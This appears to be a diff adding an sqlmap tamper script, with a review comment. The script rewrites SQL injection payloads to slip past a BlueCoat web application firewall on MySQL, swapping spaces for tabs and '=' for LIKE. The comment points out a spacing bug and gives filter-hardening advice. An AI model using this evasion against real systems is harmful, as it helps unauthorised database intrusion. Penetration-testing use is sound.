1+ #!/usr/bin/env python
2+
3+ """
4+ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
5+ See the file 'doc/COPYING' for copying permission
6+ """
7+
8+ import os
9+ import re
10+
11+ from lib .core .common import singleTimeWarnMessage
12+ from lib .core .enums import DBMS
13+ from lib .core .enums import PRIORITY
14+
15+ __priority__ = PRIORITY .LOW
16+
17+ def dependencies ():
18+ singleTimeWarnMessage ("tamper script '%s' is only meant to be run against %s" % (os .path .basename (__file__ ).split ("." )[0 ], DBMS .MYSQL ))
19+
20+ def process (match ):
21+ word = match .group ()
22+ word = "%sLIKE%s" % (" " if word [0 ] != " " else "" , " " if word [- 1 ] != " " else "" )
23+ return word
24+
25+ def tamper (payload , headers = None ):
26+ """
27+ First Replaces the space after 'select ' with a valid random blank character.
28+ Then replace = with like
29+
30+ Example:
31+ * Input: SELECT id FROM users where id = 1
32+ * Output: SELECT%09id FROM users where id like 1
33+
34+ Requirement:
35+ * MySQL, Bluecoat SGos with Waf activated as documented in
36+ https://kb.bluecoat.com/index?page=content&id=FAQ2147
37+
38+ Tested against:
39+ * MySQL 5.1, SGos Rules
40+
41+ Notes:
42+ * Useful to bypass BlueCoat recommanded Waf rule configuration
43+ """
44+
45+ # ASCII table:
46+ # TAB 09 horizontal TAB
47+ blanks = '%09'
48+ retVal = payload
49+
50+ if payload :
51+ for commands in ['SELECT' ,'UPDATE' ,'INSERT' ,'DELETE' ]:
52+ retVal = retVal .replace (commands + ' ' , commands + blanks )
53+ retVal = re .sub (r"\s*=\s*" , lambda match : process (match ), retVal )
54+
55+ return retVal
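Review bot: `process()` loses the spaces around the operator whenever the match already contains them. The pattern `\s*=\s*` consumes the surrounding whitespace, and the conditional then adds a space only on a side where the match had none, so the docstring's own input `id = 1` comes out as `idLIKE1` rather than the documented `id like 1`. Because the match always swallows that whitespace, the replacement can be unconditional, `return " LIKE "`, and `re.sub` can take `process` directly instead of `lambda match: process(match)`. The docstring should also be corrected: it promises a "random blank character" while `blanks` is the fixed `'%09'`, it shows lowercase `like` while the code emits `LIKE`, and `headers` is accepted but never read. For anyone maintaining filtering rules, the docstring's stated purpose shows why a rule keyed on a literal space after the keyword, or on `=` alone, is brittle; whitespace should be normalised and `LIKE` comparisons covered before matching.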